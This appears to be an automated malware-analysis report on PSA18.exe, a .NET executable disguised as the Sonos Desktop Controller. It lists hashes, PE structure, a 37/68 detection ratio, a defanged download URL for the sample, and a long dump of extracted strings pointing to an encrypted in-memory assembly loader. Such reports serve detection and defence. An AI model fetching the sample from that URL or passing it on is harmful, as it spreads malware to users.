| File details Download PDF Report | |
|---|---|
| File type: | PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows |
| File size: | 235.00 KB (240640 bytes) |
| Compile time: | 2018-02-06 23:48:30 |
| MD5: | c7f1dbf1184138cd0a6dcf90f4266e01 |
| SHA1: | 44eee0ee6b093116a85928c153609c225dfbe4d1 |
| SHA256: | 9d3ff871ef83b285922eb40dd4a6c67a40aa5ce2de3d7022c95ae16f70187c1f |
| Import hash: | f34d5f2d4577ed6d9ceec516c1f5a744 |
| Sections 3 | .text��� .rsrc��� .reloc�� |
| Directories 3 | import resource relocation |
| First submission: | 2018-02-22 00:03:04 |
| Last submission: | 2018-02-22 00:03:04 |
| Filename detected: |
- PSA18.exe (1) |
| URL file hosting |
|---|
hXXp://dukhdardhis.com/PSA18.exe |
| Antivirus Report | |||
|---|---|---|---|
| Report Date | Detection Ratio | Permalink | Update |
| 2018-02-09 18:53:06 | [37/68] | |
|
| PE Sections 2 suspicious | |||||
|---|---|---|---|---|---|
| Name | VAddress | VSize | Size | MD5 | SHA1 |
| .text��� | 0x2000 | 0x33fc4 | 212992 | 9ab95598f5c9010bc320d93958ddc725 | ff862b3d6042e66d3630738b237db775cc39d65a |
| .rsrc��� | 0x36000 | 0x6800 | 26624 | 25f180f7e8c589e908245a56876beb5b | a94d102453b46641b8d93f4722bad07f2e351bf4 |
| .reloc�� | 0x3e000 | 0xc | 512 | 73997b3c320caec36d063f42843eed16 | cdf0a487b7e3ebb017378c7cd29243132770fbdc |
| PE Resources | |||||
|---|---|---|---|---|---|
| Name | Offset | Size | Language | Sublanguage | Data |
| RT_ICON | 0x3bfe8 | 1128 | LANG_NEUTRAL | SUBLANG_NEUTRAL | |
| RT_GROUP_ICON | 0x3c450 | 132 | LANG_NEUTRAL | SUBLANG_NEUTRAL | |
| RT_VERSION | 0x3c4d4 | 772 | LANG_ENGLISH | SUBLANG_ENGLISH_US | |
- API Alert
- Anti Debug
| Meta Info | |
|---|---|
| LegalCopyright: | Copyright (C) 2005-2007 |
| InternalName: | Sonos |
| FileVersion: | 6, 0, 0, 34230 |
| CompanyName: | Sonos, Inc. |
| ProductVersion: | 6, 0, 0, 34230 |
| FileDescription: | Sonos Desktop Controller |
| Translation: | 0x0000 0x04b0 |
| OriginalFilename: | Sonos.exe |
| ProductName: | Sonos Desktop Controller |
| XOR | |
|---|---|
| No XOR informations found in this file. | |
| Signature | |
|---|---|
| This file isn't digitally signed | |
| Packer(s) | |
|---|---|
| Microsoft Visual C# / Basic .NET | |
| Microsoft Visual Studio .NET | |
| .NET executable | |
| Microsoft Visual C# v7.0 / Basic .NET | |
| File found | |
|---|---|
| FIle type: Library | |
| mscoree.dll | |
| IP Found | |
|---|---|
| No IP detected | |
| URL(s) | |
|---|---|
| No URL found | |
System.Reflection.Assembly
Sonos, Inc.
VarFileInfo
Sonos Desktop Controller
InternalName
#/bw
System.Security.Cryptography.RijndaelManaged
Invoke
Sonos.exe
Sonos Desktop Controller
TransformFinalBlock
rawAssembly
inputCount
Key
StringFileInfo
Translation
LegalCopyright
FileVersion
VS_VERSION_INFO
Sonos
000004b0
fff3f
Copyright (C) 2005-2007
FileDescription
OriginalFilename
Load
inputBuffer
obj
parameters
CompanyName
ProductName
EntryPoint
6, 0, 0, 34230
3f333
inputOffset
ProductVersion
Z
t$> j
IHUF
i-H]
N7N"NyNqN
]$J6
}ric
"AoR
iO]^
@kS*
X0lh
Int32
|dvs
8tWO~
!xbpW;
3 !p
5;_2
* 07
jr L
vj_%
Wk'k4
TabR1x
Nz2MGllWkt4CE
Wh).
yeQ
5gN6N+N NON NrN N&N7N/NVNKN[N%N
slQPn
['m/
aN@
YW6r
Md`.
>6a/0
\9>x
7l /
0*!5Q
Y>r/G
UnverifiableCodeAttribute
MaqYlP
pt0t
>aNGN\NgN)N
<EFS
]999?jdzU+9jc
0
P9[(
n`Z0|
Qai,9
q8j5
+ Y3
E8H6
UZre
F )
m9{~
jLS1
l"?\
p2)(S
J{D9R
peciv;O
EgDuG
-RaX
oK3U-
H-&H%.
r>6y2
t@.x
mG_
n'C\
j0r06
NMNJNGNt
P2z
>v]hR
8VGm{x
N8NPN
32,)j
;9R3
zJ ."
rV/f
aC{%
@Z0O
3e2$
<g !
.j34
)$9H
xkQ'J
x <#j
$>v*=
PQX" |/
AMq\
YLe^
HXnv|
eoH 6
_%g9
*p6(
>D$c}
?| J
X^=/
P8LA
E8zA
OT:.
53u
?.a-q
~ .w
sI4-9
m5A!
VQ\}Q
"p?P
U%vH
FS;PH
lB_D
N R
JgjuU
.@wF
(IY0
("ON
D$3d
zo{.
sR>}!
!dCLg
p),Z
q.kNF
System.Security
e?Kc
N N6N;NuN,N
fbtNZ
$AjY
X \
wwwxq
ga=f
X c$
oM)O
x@_Ak
_kX{-1!
?euK
x6#T
oyH!vKC
F^1D
@mQN g@
lM_
)4k069
Zas7s;s7EE
.4%fg
5@ rt
~v B>
e,$'
||K(?8
>iC4
>A:u
X=:V
:HMyS|
v/|=
zd5,
#yCD kpQkQPL1+
J3,a1MVaIoqQ
v ^%!
8QH(n
1LTT3
@ B
%`\m
G4Q)
Qpfw
{p ? A6
@A [
.D"_
3w}%
\rY'6
G@@9999d
=;^;
lL%Lg
r,.S
(Y3,
A4C8O~
Ix3h
i3?S
N#;Dh 1}
T_>,AL
Z@~oz
2f7[
0Z;E
"1BB[o*
f PE#
NUN N(NhN/NZN{N1N
H>oX(
@AJ u
AppDomain
^M;3
ygf`f
Sw[<G)dU
5 Yp
1'iE8jq%
y%4nN
qlH@
hlxK%l
get_CurrentDomain
|m0x>
YXP^
CRM`iz
5CScN
<tq<
o:-Rw
Tq6Z
C+|/a/`7
SP "
}xTdMT/
1>h~
'%m.
p1FU
e~Am
5PQ0
p dK
p<:U
{F+*
!vW9
+:'nP|
^7t\
%?CZp$
B,l_
>ODD
F?e1
5O:
vl~V
gDk:
A^.<
A, _
f_,Y
7;O:O:U} Zs
\~2~.
7:HR
9hR7]
c (1
= 4$
rz8S_
`r sK
t*fk
/EPh
b{%d
N N6N;NuN,No
( *@sc_
I.^~
k 8r
# ~~
O+7k
wwwq
3<q8<u>
6Xuo6
_6fMN
>L 0
z2 C
o67Kb
#Blob
^y xa
DZ6:
get_Message
S.rH
% H@
<*lo3
I9G,C|
r7q>n
6y&O#
hYy3G
>h&#
-F}G
J?e>b
vV;M
R452S443J***?
YFF(W%
pa$$D
9OFC
d&d}
jG|,jy
:z}H
3#I
R?_^
)`!L
Type
d Ju
[MXpf
<sd7
'N*1
5e!# :b
joqtvusiA8
!\l+
%U%Oc
/TJCk
Z\}
!;4sc
[Lh
e jn
67pJ
a:~ ~4
"o$cD
v:{"
OuAMG
u^~r
DLa%
Join
S1?'+G2
At G
VT?=
OEdvs
A&J"N
mfa
7!BvD
d^c"
L:YT
CWf+
TTS'
4QuI
MNXK
/2xl
<]<)X
>/H:4
vVr!
WQVK
y.C
~_A9
AA@h,,,G
fmk
7 l?T
5<Eeb
qP0h
o ny
q4)\
GetValue
]zom
P 5|`8
}wn?L
"Ee_c
_V E
s F`
OVF5/
PkBN
iiKi
S+,yA
6.?0
8Jc,
#$!G
U9G}b[
PRkP
-puX
Ad^x-
0+) e aWS
a(@]
/o {
A/ 5
l3NN
MK9|
}HGny}
=j_
3.TD
$ [B5
Oq}"
Uc}v M
7*{E+_
}]LAd
_XAI/1
[a(K
}siW
&|*j
2%anL-
p'ZK
RED` v
>XLB
tgaN
N]N N[N7N
Fh `X
KZc
Exception
DialogResult
qWin2G
.text
2+LU
qW-F
N[wK
F[E>
m=%N90`C
0\KO*
1ceQ
"PGF
GF@ddjd
sxx:
GetObject
v?]~m
i~}!
y@PH2S
~_Ps&
+>sR
$mM"]
:)<=
{^e#W
A}$2
$D,|U
aG%0
{[WY0:|
Pg]X
/7 8
kz)\`
NKN7N
p0sa
M 09^
"28.
k%G,
* j_
SkipVerification
G9 c[
8QR_,
%AB+$
V Bh
zzUU
)!{[
he-A
NV=1?
H!iE
V %*?
0+Si
+v!F
@+Cz.dv
,Y9^
NoNLNcNXN$NINXNzNKNeNAN
$h&
a]jo
CgL
lF6
!Kr^ib
2cV/
Gb(G
_|l
2;>
fQUXS1<
N NVL
p*^%
N)N=N
k< F
"!#=!!!%
Zo^UzBy
@V-K
rZv A
GetCallingAssembly
JML9
ixi{Z
rM|Q
7DvO$
%{s=
7K'g1`
$Z3 R
"$cv
Ip_A
"9'L;3
W.eL
.3f4W
wyNf
^s33Hm
{Ef I>
,YNy
dj&!
.O$>
1DLb
{WHc`
Ntg"
g'JImrw
Y(#H|
G b
yQ~v
8j7qw%
W1_\
pizd
#|_ xv
?N".
P7]@
Ka95
4<BUWDBXi*
7p_@
~V ry
&@?B$ng
tv~:9)
Cc:'
CTX_
dB N
Pl1ur
?^Su
iN}^
.h=V
>g-.
()<!
C8mw
37BwK6PfwcNEHBZSV
P 0
P`L=
lIKN
9G .
jh 2
L/\e
yZv3
gIOl
c5p)
;!'!
N&N<NjNqNpN NCN
[<[^Zl
V E&j;
C*<
'wG)
ozJy
ws\k
nh5K
_ogk
wALo0i
Fgy
|| ([E
A bzT
ugl
Z/R N
M*hb
P{m-
,3U*;
%fc
{z"M
zRiO
PC@(1
/ys)
RD_x
0q9-
7/gF
#=g~
5<@B^+
pFBa=
Weat
qeuTL7-
sHES
s9#5
f%IY
X>k.6
0!y$a>
b5S2!
#5C-E2
L@{9w
jjjd?
_Fg.%N
H<.N
|v&i
_Sz&
Pm(b.
/ OG
\XfW
cyxSMq&_C
Y`hg
ax-|9
YZSC7778 &
'$t
M@i3
cPSH
w[0<
NaGJ
nfKN
/ Ut
W]!r-
)0YX
#W{6s
<bN8N[NcNaN(N
F'#(,
JYo*
MB{;
ryil
3PO=
oe\.
yNZP
O')p
Fc36
y H?
{!vO
F (
:x W:
#s&@1
blT_
W!z5
6wf's]^
eh*
*JG~
&Ou/
JZa-
rA6r
lm*F
|jaG
RLqkI4
7&Un^
System.Windows.Forms
P!
\{'f
3g[Pa
37Do
r F_r1
NKR
]j7
l^pw
&: ,0
+!6r^
08[`
U>*0
As+L
`w\LJ
Ppz{}]
!K>I
6ki0
dk@^
Kr%+U
<CU9
VcYZ
*Cx$k
vfeV9kzi90
NlX_>
#_D
XsBVV
stpt
&X Z
P! l
Z<'^
/7 &
C h
zh9P
/4Zz
6<</
V=Ls~
^ x|
A<Vm]o
Gfd_"
<eB=
$}bh8
p`&bj
`UK\qF
(j$Bm
("#u
Q 5
XA(~lu
(X<)
v <
M!NE
=Ag6
ltvV
:h!_
k+,
R4]t
x]!2
6 /v8
"$!yo
f:%T|
+gg(
m,ws
:VL0
h5
oQGNsv4JTyBe8o
b+2M1
o_/vk6
hQUf'
/o7P
S7p~=
ud 3(
6<<]
`&q
8~1\%
Nv0X
/ -
skhJ
v+(b
Qx2~
[v;+
2&_t9W
WIo-
H`hO
' 'O9b
System
u23DW
-jVh
n@o7
p{s3
4=y.
d_F|
"DbI
i-WB/e
,+++"
q_+WF
,O2K=
S3/^EO
i08?
+ObX0
40C'
X=JDC
dj@
#${i
rZ6JEh
T#9
N)N4N%NTNrN
8vgp
{/q
q9k>
nTQ#
q{<zNV w
CreateInstance
o12F
DhRm
oqC6
aL@9
toZ>o
#Strings
-DCp-
)ygK
K9
yl/E
kxc+
6~ k
>? 8
"@-*[
d":H
3m6TQ
&@|?
Hiy}LC
B}#;v>
%1X1m
5p62g ^
swju
/IB!7
<]C9
iMu|d}
6F65_
eV#Qv
11oI56h65YICv9
%V]?F&'
9zXr|
0E&?
@K8m
/+KC;
Z&+Is
#!,#cIV
/%$GV
Z}+r.
"PP`
O;`R
x[bF
9(<n
H?41
ME'p
[K v
`8aUv
+PH
e{S
>wa\,W
4.x
>>>Z
;WNmMX
;6-M<P3
-6(NA
qs P
yCWd+
7 #X
+'@6
q}8
hMCF5m
fv~S}
q8
NdNVNmN(N_NGN N1Na
i0AC
Pg$N
cXYp
GetType
NjU7q
8nx
L{=d
f LsY
drn^
$v9)
o_@/
}`Pqfo
+6 F
RAkU)
NDNVN\NlNSN3
+c rn+
Activator
so-0
k-_O
@B_HP
WZtVX
\LV?
G W@
~.xN
j{5
r6 EWBY
S2(5
dUM!P
]sUG4
6PKHn
knqONNLJJG=>9
i]NpjO
jQ|]
I{ WMU
`'u[
$Cg:
Va$!R
=DD#_>~Q
S~|4
mG7m
, km
3ip*I
R$ur'
3kj$
k.{s
usdw
zAYb
v.8#W_
,0G
k#2u$
NqNGN)NDN+N
3C=s0
[9>mT
=[/(
w}''
pn 7
xrU1M
P{w8
LZX[D
X&\SM
RwG<k
t:eE
z~Sh
l-*1
(/;t
k!6s
qA`T f
v=<t
pVZH
v+BJh
m>byt
Z")f;
N&N0N
LJBp
_6 P/v
qu+
-25K
7+ G
7c\Y
V\HJ
L21d
9K
sF30T
x``,
uo#h m
Szn9
}1:x2
OgJt
E]W)
mA<~A
&tCvS
Zh-Px
886M
=Wb>q
Z?w
j%Vp
V _s
1W (g
iehr8S
6\%>
N'N6N
R a)>B
n|(k
V'jy
7V(b
[1f
B-Tz}
*7X}ru
2EU@
0G 9y
2D~q `
mTPz
I,;RU
WW #
u_
H/oV
E0b[
VVUUV
w'I5
IV^ZzX3
-M\\
Vp["o <
8 o, 0W
N=NnN
kuz8\'
x9 G
*Jy15
C6kWT
S_#!
Oy]Qr"
`j(-
8[kv{
<^Py
k>K}{M
1LhQU
beJ6
*`Yq
c.-lt
>4?:
p8N%
v8'z
Y$fB
-%>!6
'lL
C"J(
Dp'3
g26}
Jnh?
t%;a
tWN
jTu|
!*},
MjL^
?fTV
b68C
\`Eo
-met
;BMQ
5P D
LjWgJpgpoYhFPAmZkYv
U]9d
CHK-
hx@v
&St2
3NYd
X=<:>`-
(D=)
KPNQTcnprsrpi?
b1/S
o p\
a5y5
2BMU
H4k,! .
& % |L
0SfGh5
`z(d
TYNt
ZWvd
_"T9^
JflW
1)Q~m
CKKG
=Iv6
2T`+
H Z4
AicP3
#H.
c5 s
]'7
(*+N
(>v-
LJ&G
?!>s*
Af1Pa45EPsYV
2r/\
YPrZ
K+Qy
lC,Cn
<i.y
y-8&
N~SW
;xzA
Xa*P
[xew
,]Re
N`N.NaN6N
mn A
)_3l
bSVh
~65J
1K<q
yg_u
mY )
`p|$
$D9F
I"|o)
9R3
ji k
{/v
7 T
vL*u
n)U#
T$v`V
^PE5
32KSA
5bfiT3#kj
`fE|
ET76'
xdhae
^ *:
r q %
5lC}
dbLL
x 50H
!eY[
jt-"
8!}
4zOw
h01y
pEqi
S?ayl
YO<A
$^Z+
jN4x
MiRg3L7OBk7yqbSau2Y
A|"|\/
w.2YiK
j;B~i{
vak?
{C0 ]
qPy8\
fEl}
{#hr
R bJ
U _;!r
./)N***?
NANIN NjNfN
jjj?2
D0H0
xd1TC
yl%8u
a2wC
LeCj6
X \x
N}UbT$@N
> igO
K3T5
V$U(
)ZTz
8+U_-*p
P
Q0,n
3{FE
Ny+XbHC
'3Tr
De7-Ck
hu<yW
D`X]
sonV
d..d
xzm`
n3@3
`u!/cE
z}%\
_]'
mwV`o
)&?#
NJN#N^D
yneWzj\
j'WR
-uHzg|:
NfN0NRN;N^N
[zoE
Gv>zF8
(}<1
.g+t
;n)K
*=sH#
P0V[zb
5 3
~~}K
A^p
0DHC=gi*
VW)&u/
3H X
AP)\
BM-4 G
3i>}
9Tw\}
O on|$
U6l`
Z6^b
NY/n
Xdh
KH]s))(B
System.Security.Permissions.SecurityPermissionAttribute, mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
Hv-$
+UUg
W '4\U
N)N3NMNYNIN
.lq+ -
!wUN
.$&)
/nEj
NrU8
=\ P
-^9!
D^ F
J-vhV
Qe.8
Id8CK=a
j\CC=
Fv 1
Z 5:
[0 ^b
t'dl
j|'*
9c/x$
U&t#-v
,\d
K/ZL
2/5
gx7pa
7.\c?j
WG4|
|OYzP
kj.~
.{(VNA
S?^z'
[x920:
^Nf1
6:A^
4: i
563\
|oWQ
D67G
7DT
OBaM
tWn/
EIAj
noX9
z/%l
wtgc
e$}
LnYK
:o~YQ
wwxwq
XUxa
zwB3
fOE
kr2LziFtqfB92y4
lomi'(R]
IP"oO
@E{!
LateBinding
$hY_d
ku$,.aDy
0/n
NTN6NvN4NtN9NzNeNlN
9x/I
F_T
7Fs
NaN0N{NqN N
>\P~W
I,%d4
u> ^
M%sR
K*rF
h^uv
d.B$
/V<'H
YZ ?
vX7`
.ctor
|%;ki
B&~*
*=~Y
X@}Ys
=& 9E_
NVy"
rD#NU
F2`Qe?;
:myQ
yA_`
NNNsNmN%N
@ :"
)c1j_^
XZP{
y`D {
V`TF
wwwq}
x1)F2
I;Hd
Txz[s
MH%}:
!X~
oz$c
]#@w-/
C,JM
95!]
YAH*
en t
yk 9
^ )D
o$xyb
K0^F2
6V_K
z rT
)!Ro
*#/L
!kL{
cCu_9
*7RX
7eEA
L_ '
MessageBox
(M4!*
&TN5
3,9%
)%?=
Bge
g9DD
egK 0
[ Q>+
m 6l(f:
`-Kf
|MqW a
/#09f
mD"lU7}_
2! &2,
UDy>E
\#!=
p[(h
?I8<
oa3[
W;V-E
M6zGF2
TAH V
@ls$
J]K
%;0,
]$%=
@.reloc
H)yq'
yl|aY
Kavb]
{0Pd
QWJ,
zJE#
j'I9&
tF>
=A#b
Y7^\
Fm2*B$
t{ RBc
s,N
U`Eu
Byte
2O^@
k".o
b>(E
N%+W
WrapNonExceptionThrows
*ba
d^&
k1&r
1L4xU
NwNoNKN6U
?/<x)
I Vi
F,*u*
/q _
0Ue^
\ \@
Vdjd
*M T
!x/I;
aSDzbGn
hf/4
&+>s0
='^j%Rd
x z
wuR6
`D)_
Le-4
ozm'
o)rq9
f(}gA
R>]J
|')6
1<cF
s9wP{&
97?kv
-8TQt
/H/!W
JMPTamqsxxyrW)
F_9
|$"j
5#8*v
}@eY
!]=dAo
6<AE?f*
zsCN2
j|SM1
$tm*b
99}O
LMFK+++8
dM #
\System.String[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089PAk
yXI9(
w;7qR0P
)324
rN2|
v,+<
++9@G
JE -
+{:z
k2XAs 0
>8=a|
O"VD/^g
!w@G
BD"$
11kXnsKSry8
\wZN]kj2h
YCE2>
?vV6i
*z$+
r2,Qn
Yuh?B
u Q\
T.
h@zV
w_%C
jdVU+
];c]
-Rb/-=!
Nw^R+
98Tjp
9XJ
X{?
5"~@U
,H =U
3^?j}
*fm[_
RuntimeCompatibilityAttribute
dfWL
_~d6
v5][
z]ug!AMk{
5]M8
Assembly
2#]'
NHN5NpN
qW)7
.resources
IL1v
<2Fp
nVlR
EeY+)
Microsoft.VisualBasic.CompilerServices
u|kq|u
*$7>MlBw
#?l2
5l^>V|
zo5%
>_tm
yXuv
V+*1
Y8L4#
;G,H$I
)>la
;pAL
+]j@@??d
!=#<R
52}>
O{<}E
9%y/Q
P}7tP
j!i&1
mS&W
*OY'0
|c @
k8.o
fnw
![ wy&A
'zFl
z`An
@6&No
<#N+
1#c/
lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet
MfQ`2
2=F?@2)
4<J/A
YAme
E2y
jjd?
w}@LE
7owoG
w;@K
p#q.E
N|NDN
NwNoNKN
Di5'
vXOw
|l|
\3qo8
apeSE
Y3 q
(Sg
V ~d
FB8R,q
_M7u
~ B',-
M,"+
)m dd
hnzF
v.V#=]6DQ
y*no
J5]z,Tn2
9%YdC
xL/8
M r-o
Resize
Zs%G
N+9,C
Y8[pf
%H(><
Oi#B
aRYV
$Sv(
1@9bL'
Y7WU
i0B>
i>X/o
tz3(
|7;J
2&&&P
VV8y
d}1i
O3*9
==& _WK
r Qp
V(9i
y$]@
[h3&
z{oK
M|
k(VYz%
bY?1~@0
&(D_
K$g{
:{/
{f9C
"K/
BIU$-
78>,%$
0`aY
8' v
X %`c
!Fj_
wwwx
7Nm:)
4NLW9
)f6{
e=NdzA
we!/
v?+@
Rr^P
QV:1t
j_9
8KDKI+
si_B
QGh 1R":
#klW
Kj B
2w'
lwzC14
v~hp
v8Y|-7
$],0S^
4<ATUWDA[k*
7uu
G?qe
&W:+
|Q{)
<PIZ o
{G#P
D9h}
lP1>
oB65CMBAfwcTn4wn
X$H
>EFP
ResourceManager
Show
,"~86
W Zk
mF#<~
TODc
| 2.
LxJ*
ivJ6
2#Oh396
'W9-}x
Q i|
\# w
5qOc+
l#!aZTR<
tW"Z8
Iz
~lc-
CBLy111M (
snx_
&Gs
npB3/
{*q:S
(I&u
jQz9
u@Ng
qd{[
W$I6_s
/'^ :
?i4>
N}NFN~N
k5$
_tqs
OFI
E$zX
#$)&
ZgM,[F
P(ZF
DI;b
!\@q
ng:p
2o( E
qqCT>
ndNNNKJIHCA?;
VG E
"8kY
vZ)a
3K=6
Tu{\P}Qu
`O=H
;9WS`
<Rv(
ug^
,m<
P/|L
f!o*
,LN(
lKmt
t,U!>
Bc0k
G "5
i&F7
Dn{e
pTS.
/TXF
gfPuoE
, Nh4X
kq7a
ba/3
oO@
x's>
>\@Jp
wdC
7j B
+63n
\]f<V
0(Ja@
u mIYb
RP,)
BwSV?
Z(]r
1%R(
*["]
ZI6O#
5g|9
&8j]
Ie/}
tr)
|eR+
\L?,
X.2;
l(PGe
bg 5J
yW=K
|q! J
vnx3@D
>1r#
"tS4
TDnm
e!S
P/5[
S=cd
H,C^b
sTMK
D;be
A./B
*r>MN
JtZ)^6
|Pp
= H%
N&NANDN N NON
d ?M C
0ZV
\q L
]5 q[
_Z@l
;}/ki f
30E%
q^_
W%NP
3.I0
67NlNiN)N]N*N|NLN8N4N`NzN N=NONEN1N
muWa
5"T.7
Yt},
NMN;N0NyNaNHN
F Lb
IRC
SsW
+ _B
yLLLI
k,>L8
k7S&,,
N8"M
}M[#8
?p9*)
-S -CV
|gQ8
WeEv
B'S:
&N!L
\MQ
-w&m
4E+i
Me#:
bkF4
a^Kf
FL?<
(e`{
S_ }^
#ul1
<H-j
s6srwosF6efsIh6
?nlSc
MgV"
2vh4
@1b0
.FW^nsxs]8'
g+,V
dTF
$QF]P
U #m ,
Wc|s,
.?Xx,x
HOn^Z
[]q=
1+He
N2NSN
@RR!
%z.{
=+U B
bY/%
62DFN
A)7[a<
y!?=
$U$E8
IJh7BW5jwi5RE
}tYQ
tpZA
U]o6
mscorlib
b)Fv
7- G
g/:/
VTS
ahFQ
mLvMW
0@RU
k,|t
{}lL
v{sa N
ZOL{
o"7g
| rZ
,vo,N
:Bz_
1WQ0
tZQ o
3fVLDeq
X(tW
kOnap
!y# g<$
vt|2e
<2oa}
ar#!]
n Yd
1dNS
e}=c
jj@9
Y x5
*fLJ
0xrJ
A3%H
jVG/
[Qy7
r8yJhl
@>f'
v,;+
w<31
^pl t
3F(Nm
System.Reflection
iWZ9
|&q{
2xcZVi
t5?}
>|/'|
Qx^0dv
4;\A
w} W
80'@d
v\n; }
"/GY
-eI lI
xwcm
^R}}>
L fU
MjVITEw9UdlQC4EohQh
XYtB
oeQ+
a$
B*"a
B[* #
"{ -
||O)
Q1U 1T
tLnr
{ T D
F?C!s
8s=PZG
f(bt
QQ!_e
)'^l
ZZZ"
pYn
UAdcV$
F q1
`sbP
YD5
g8St
q V*
jj@jj@9
1dS7
dMTw
F)|;
NpN[N
Juia
/ogX
& m :cm
mf!#I
gUK`
FRJk
^`rz
L6o?
G~n8
9@?9?
ZmVA
Zi'73
`iZF`1t
*pP>3
X?-yL<
}%`H
[e ~w^
='E
:B`dO
) 3$
mWlFC@
@ mF
G kt
!waH
vtPT}
a (G
HM4E
@OJR
4<BVGBD^*
2 '
jDqi
Sij>
4gN6N+N NON NrN N&N7N/NVNKN[N%N
Cy'V
8(H$
NDN<N%NbNuNyN~NTNdN
BL,]Y
R' 9
O&*C$!f0
cw[E
0];T
r;|~2
K|m'fx
% W&
A<tR
yR'.
s;cA
zZLd
dBZ'
)'aM
~U(|
Q 61
B |w
J ==
92_{ ,
5iub/
DcNNNQTa`gg^[X;
([ ?
W_Ve
?u2!"x"
kr,wsW
u A?<\
#fn:n
VDM-
i}y=!N
In5@
jR7Wsv
j$Xz
{1Nl0D*Q
@g~BR
3 8ST
eh]F[
P Eo
%>GP
yi[d
xcZ;
d
]0>^m
Y?t*
Yzj7
om100 \X
SguS
dhz
f?.
3<kh
5A(7R1
"94!b
u4OE
!This program cannot be run in DOS mode. $
CK,AV
7 n
Mh$
9DC}
&muOZ
\WN]
K{ N]w5
%hnjV
j. e
Wp<e
M%zy
noCJ
&b?d
O'yi
_,IHL
FD3 @
;Fj3
5%aw
t9)!<
*)-9d
"" f
M2f(
@<R_
=1eJ
Kkqe
\`0|
%K-u
&2wU
yMi\
;bY y
yg,C*
~(Cd
>e'-
P 6
e|<9E
^7Csv
:= RL
@<R'
mTf
RS~Yl
!sx u
<8 '
LateGet
zs,n}
Jy9SA
U:-:5
3!a-v
`n^:zw`
"OSR
#GUID
Gppi
NV{,7
N~On
V 9R
.,7N
+|k+
5y[*
fg[~H<
8;wn
N!N;NzN%NBN
m<
,iCO
1I:x
)iW+
k-HeV
hi9
%9.T
F{&}
:#B=
[n62
BSJB
y6y
Fl|L
(i;B
S97Rjt
n]6}
Pt<d
u<vz
F/&@z
igcV{
@C?O
@@>m>>=\%%%B
~O!P
WmsS
T6b
0!B$y
<qu[a
wsf
} )
?aNGN\NgN)N
=2<|
NeNXNWNsN
br9
0#}%
cJ39p
lpc"
f +u:2
wq*1q(
njh\
S.gx
)J[B3K
*~E`E{
UV>
F~N9
e}KV
;N 3
0"GZ
-zVcd*$
YU t
Sw!V
1c@*
;^Ei
)iqxv#
1{FdFe
<<8W
<+Z 6<
: NqNEN
HT%vi
\+L98
NJup1jjbCvnAkBpI9
[ 5f
HCcA
W " A
)9@R
275]
]w0`*
cs.3]
*@kL+U'
Hj;e
DGi-
U ={
7W1+u
FA^6
\UF9
D9B}
7zG|[
N.N]NNN~N N
,!_ 0
>~gL
g#xR
eT\z
v+R@
vg:'
bIN0
N?NGNNN
N3N8NLNlN
A6ue
5ucU
DS(_B
:hQA
GS2n
KVvvc
ei,s
u {R
g9}^
~tcK
fVW3FhU
|o(x+
~_+P
w4cd
m\#
_~6x5
0;NS]
R~Ky~
V9>L
jHhVfCN5OF3Ma6
>D,a
# U 8A
.^0
rd]I
dLZ4e
:`fQ
G)J
5SRZ^
B}Slc
%z;q
*^Lz
9#b*
g$l[
"mjf
GetProperty
mos-
] l|
U75zy
.sea
jjjj@9
Pp|h
9H}m
U\*!e
lt]L
#aXLD
N^NHN|N
@ w(
${;P&
SB:U
oT Qz
A*|t%&o
Fioe
N_N!N
c.ba
UnvJ
4R_w6
z=C@12
AYt?p
3[ 0
s}0X
5}A|
RT~81*
7mUs
9?tJ
-lA}k
nn\[
JVXPk
(/e;
NXNTN%N+N<NXNWN
ZnSu
6UrMv
';KJR
lc .e
N{NIN
,}qOu
VGBX
<CMA
\i(g
40I"
p[+^}5
6`F
SRrJ
G@@@@@dd
hyN6zM
4a: z&
bR D7
@ #HP
vM}
>X<N
|R&c
DHXggeN
HQ9?
?jR;qC
iCp%
<.!:(&
CompilationRelaxationsAttribute
?}*J
dm9\`Vaw
www
yaE!
TLTe
kR`xe
D<d;
wwxq
[$e S
f7i4
n|Fhgxm_
baVhvSYOce
Mby#O
LF@A
%Ba{
SqybH
J^6+
*KO[?m
d{='~
[tbzk
&y~A
AXA2
7|dk
($ z
Z%2`I
Array
dx?f
`>9%
zQt .
)*:k
N'NzN`NwN
wwwwwq
_!B^
p'yl
,[hK$7y;
7_1}'
~yd(
D{EOO
NZN N
N Os
`1sj
Kx--
GF]5
A#9Q
o0|W
N|NAN;N#NPNUNcNIN
rb5U>
=qw
L Ls
6k Kr
)%3R
(]j%
1wFU
.&ZlW
\4JH
8eb8
E\-Z
vIN~E
q1'9
XnIv
1 '|h
N[7n
~1L
rl`tK6p
"On@v
~:VO,
3HlK
8 _;
"a D
<dDD
*+N%NYN
IeNsbT
}@Fh'
9hatMfr3PfkLFrmBe7R
:qYn
?]8e
tzT$l
N}|_
o ]D
'` f
{`{"
.HE5
s\gG
qYr}
A|=,"
ehU_
iM?
=. Z
E!UV
!EDv
hM *
++N%NYN
d8A`_
PbWD
)!)U
]0O
apcL/
nI:|G
AF 9
40|_
2gM*
q{DL
y{a\
tSTQ
)5n
i@!7
~eg"
2 KeZ
fy-r
nMaQwI
vI`5$
1
1/-
"6a*
Y>dk
n$G_
ZMLmD@
I29We6w5TJ17Y5u
xVw@
njp:}
xP"}
Hbd]3JJJ0
6rrY
4H
yM6H>
zM~-E
,xK2Q
0rQMF
9i8ncf
,u8;
6'"mD
_H(3=U
Wi{)
.0}%
P ci\<
y* 1B
fX% U
QMvQTTtXk8vRURQu0U
Qkw"
MA0&M
CZ!f
'Ha-
>[(
K zo$
l|t?
UOaGck
K9qZ
z>!9sp|e
4%r6
z8Bg
wwwy
|%)u
w/k8q
ZU$Y
u* x
rS/
yI*g
4Usu
=8Ic
*@ j
dScP
iIuW<[
d9}R
Lr8;
LkAV
-veq
#IU"*
W%
System.Resources
K'6l;(
XncU
SRr%X'
>C4u
VI&Q
i?y(
W;my
{A._h
a i4y
^| J%{^}
3yMBJ
hXLI
F[e<
xw,z
XRLR%gT
| w\
N9Gd
BD{(
7a=R
:0D}
:t\,.
S(j>
}@ U
."*]
_/0.c
@D,,
qoMCHamD
QqQb
+#lb
YPV|%D$
Hvk8h
Le &\
LP20
!<Se
8|i>
1IbF
=u$%
E=h4
Iiq`
iu5K
Wi }
Syx"
FjQ":
